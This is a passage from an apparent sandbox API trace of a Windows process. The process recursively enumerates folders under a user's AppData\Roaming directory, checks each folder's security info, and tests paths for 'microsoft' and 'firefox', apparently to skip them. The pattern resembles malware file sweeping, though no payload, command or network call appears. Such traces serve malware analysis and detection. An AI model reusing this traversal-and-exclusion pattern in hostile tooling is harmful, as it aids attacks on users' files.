returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat" [0083.387] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat") returned 0 [0083.387] GetNamedSecurityInfoW () returned 0x0 [0083.387] LocalFree (hMem=0x572028) returned 0x0 [0083.387] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat", lpSrch="microsoft") returned 0x0 [0083.387] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat", lpSrch="firefox") returned 0x0 [0083.387] PathCombineW (in: pszDest=0x18d9a8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\*" [0083.387] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\*", lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0x586ba0 [0083.387] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.387] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.387] PathCombineW (in: pszDest=0x18d9a8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat", pszFile="10.0" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0" [0083.387] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0") returned 0 [0083.387] GetNamedSecurityInfoW () returned 0x0 [0083.388] LocalFree (hMem=0x571fe8) returned 0x0 [0083.388] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", lpSrch="microsoft") returned 0x0 [0083.388] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", lpSrch="firefox") returned 0x0 [0083.388] PathCombineW (in: pszDest=0x18d530, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\*" [0083.388] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 0x586be0 [0083.388] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 1 [0083.388] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 1 [0083.388] PathCombineW (in: pszDest=0x18d530, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", pszFile="Collab" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab" [0083.388] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab") returned 1 [0083.388] GetNamedSecurityInfoW () returned 0x0 [0083.388] LocalFree (hMem=0x572028) returned 0x0 [0083.388] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab", lpSrch="microsoft") returned 0x0 [0083.388] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab", lpSrch="firefox") returned 0x0 [0083.388] PathCombineW (in: pszDest=0x18d0b8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\*" [0083.388] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\*", lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 0x586c20 [0083.388] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 1 [0083.388] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 0 [0083.388] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.388] Sleep (dwMilliseconds=0x0) [0083.388] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 1 [0083.388] PathCombineW (in: pszDest=0x18d530, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", pszFile="Forms" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms" [0083.389] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms") returned 1 [0083.389] GetNamedSecurityInfoW () returned 0x0 [0083.389] LocalFree (hMem=0x571fe8) returned 0x0 [0083.389] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms", lpSrch="microsoft") returned 0x0 [0083.389] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms", lpSrch="firefox") returned 0x0 [0083.389] PathCombineW (in: pszDest=0x18d0b8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\*" [0083.389] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\*", lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 0x586c20 [0083.389] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 1 [0083.389] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 0 [0083.389] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.389] Sleep (dwMilliseconds=0x0) [0083.389] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 1 [0083.389] PathCombineW (in: pszDest=0x18d530, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", pszFile="JavaScripts" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts" [0083.389] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts") returned 0 [0083.389] GetNamedSecurityInfoW () returned 0x0 [0083.389] LocalFree (hMem=0x572028) returned 0x0 [0083.389] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts", lpSrch="microsoft") returned 0x0 [0083.390] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts", lpSrch="firefox") returned 0x0 [0083.390] PathCombineW (in: pszDest=0x18d0b8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\*" [0083.390] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\*", lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 0x586c20 [0083.390] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 1 [0083.390] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 1 [0083.390] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 1 [0083.390] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 0 [0083.390] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.390] Sleep (dwMilliseconds=0x0) [0083.390] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 1 [0083.390] PathCombineW (in: pszDest=0x18d530, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", pszFile="Security" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security" [0083.390] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security") returned 0 [0083.390] GetNamedSecurityInfoW () returned 0x0 [0083.390] LocalFree (hMem=0x571fe8) returned 0x0 [0083.390] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security", lpSrch="microsoft") returned 0x0 [0083.390] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security", lpSrch="firefox") returned 0x0 [0083.390] PathCombineW (in: pszDest=0x18d0b8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\*" [0083.390] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\*", lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 0x586c20 [0083.390] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 1 [0083.390] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 1 [0083.390] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 1 [0083.390] PathCombineW (in: pszDest=0x18d0b8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security", pszFile="CRLCache" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache" [0083.390] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache") returned 0 [0083.390] GetNamedSecurityInfoW () returned 0x0 [0083.391] LocalFree (hMem=0x572028) returned 0x0 [0083.391] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache", lpSrch="microsoft") returned 0x0 [0083.391] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache", lpSrch="firefox") returned 0x0 [0083.391] PathCombineW (in: pszDest=0x18cc40, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\*" [0083.391] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\*", lpFindFileData=0x18ce48 | out: lpFindFileData=0x18ce48) returned 0x586c60 [0083.391] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18ce48 | out: lpFindFileData=0x18ce48) returned 1 [0083.391] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18ce48 | out: lpFindFileData=0x18ce48) returned 1 [0083.391] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18ce48 | out: lpFindFileData=0x18ce48) returned 1 [0083.391] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18ce48 | out: lpFindFileData=0x18ce48) returned 0 [0083.391] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.391] Sleep (dwMilliseconds=0x0) [0083.391] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 0 [0083.391] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.391] Sleep (dwMilliseconds=0x0) [0083.391] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 0 [0083.391] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.391] Sleep (dwMilliseconds=0x0) [0083.391] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0 [0083.391] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.391] Sleep (dwMilliseconds=0x0) [0083.391] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.391] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", pszFile="Flash Player" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player" [0083.391] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player") returned 0 [0083.391] GetNamedSecurityInfoW () returned 0x0 [0083.392] LocalFree (hMem=0x571fe8) returned 0x0 [0083.392] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player", lpSrch="microsoft") returned 0x0 [0083.392] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player", lpSrch="firefox") returned 0x0 [0083.392] PathCombineW (in: pszDest=0x18d9a8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\*" [0083.392] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\*", lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0x586ba0 [0083.392] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.392] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.392] PathCombineW (in: pszDest=0x18d9a8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player", pszFile="AssetCache" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache" [0083.392] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache") returned 1 [0083.392] GetNamedSecurityInfoW () returned 0x0 [0083.392] LocalFree (hMem=0x572028) returned 0x0 [0083.392] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache", lpSrch="microsoft") returned 0x0 [0083.392] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache", lpSrch="firefox") returned 0x0 [0083.392] PathCombineW (in: pszDest=0x18d530, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*" [0083.392] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*", lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 0x586be0 [0083.392] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 1 [0083.392] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 0 [0083.392] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.392] Sleep (dwMilliseconds=0x0) [0083.392] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0 [0083.392] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.392] Sleep (dwMilliseconds=0x0) [0083.392] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.393] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", pszFile="Headlights" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights" [0083.393] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights") returned 1 [0083.393] GetNamedSecurityInfoW () returned 0x0 [0083.393] LocalFree (hMem=0x571fe8) returned 0x0 [0083.393] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights", lpSrch="microsoft") returned 0x0 [0083.393] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights", lpSrch="firefox") returned 0x0 [0083.393] PathCombineW (in: pszDest=0x18d9a8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights\\*" [0083.393] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights\\*", lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0x586ba0 [0083.393] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.393] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0 [0083.393] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.393] Sleep (dwMilliseconds=0x0) [0083.393] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.393] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", pszFile="Linguistics" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics" [0083.393] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics") returned 0 [0083.393] GetNamedSecurityInfoW () returned 0x0 [0083.393] LocalFree (hMem=0x572028) returned 0x0 [0083.393] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics", lpSrch="microsoft") returned 0x0 [0083.393] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics", lpSrch="firefox") returned 0x0 [0083.393] PathCombineW (in: pszDest=0x18d9a8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\*" [0083.393] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\*", lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0x586ba0 [0083.394] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.394] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.394] PathCombineW (in: pszDest=0x18d9a8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics", pszFile="Dictionaries" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries" [0083.394] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries") returned 1 [0083.394] GetNamedSecurityInfoW () returned 0x0 [0083.394] LocalFree (hMem=0x571fe8) returned 0x0 [0083.394] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries", lpSrch="microsoft") returned 0x0 [0083.394] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries", lpSrch="firefox") returned 0x0 [0083.394] PathCombineW (in: pszDest=0x18d530, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\*" [0083.394] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\*", lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 0x586be0 [0083.394] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 1 [0083.394] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 0 [0083.394] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.394] Sleep (dwMilliseconds=0x0) [0083.394] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0 [0083.394] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.394] Sleep (dwMilliseconds=0x0) [0083.394] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.394] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", pszFile="LogTransport2" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2" [0083.394] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2") returned 1 [0083.394] GetNamedSecurityInfoW () returned 0x0 [0083.395] LocalFree (hMem=0x572028) returned 0x0 [0083.395] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2", lpSrch="microsoft") returned 0x0 [0083.395] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2", lpSrch="firefox") returned 0x0 [0083.395] PathCombineW (in: pszDest=0x18d9a8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2\\*" [0083.395] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2\\*", lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0x586ba0 [0083.395] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.395] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0 [0083.395] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.395] Sleep (dwMilliseconds=0x0) [0083.395] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 0 [0083.395] FindClose (in: hFindFile=0x586b60 | out: hFindFile=0x586b60) returned 1 [0083.395] Sleep (dwMilliseconds=0x0) [0083.395] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.395] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.395] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.395] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.395] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.395] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.395] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.395] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.395] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.395] PathCombineW (in: pszDest=0x18e298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Identities" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities" [0083.395] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities") returned 0 [0083.395] GetNamedSecurityInfoW () returned 0x0 [0083.395] LocalFree (hMem=0x571fe8) returned 0x0 [0083.395] StrStrIW 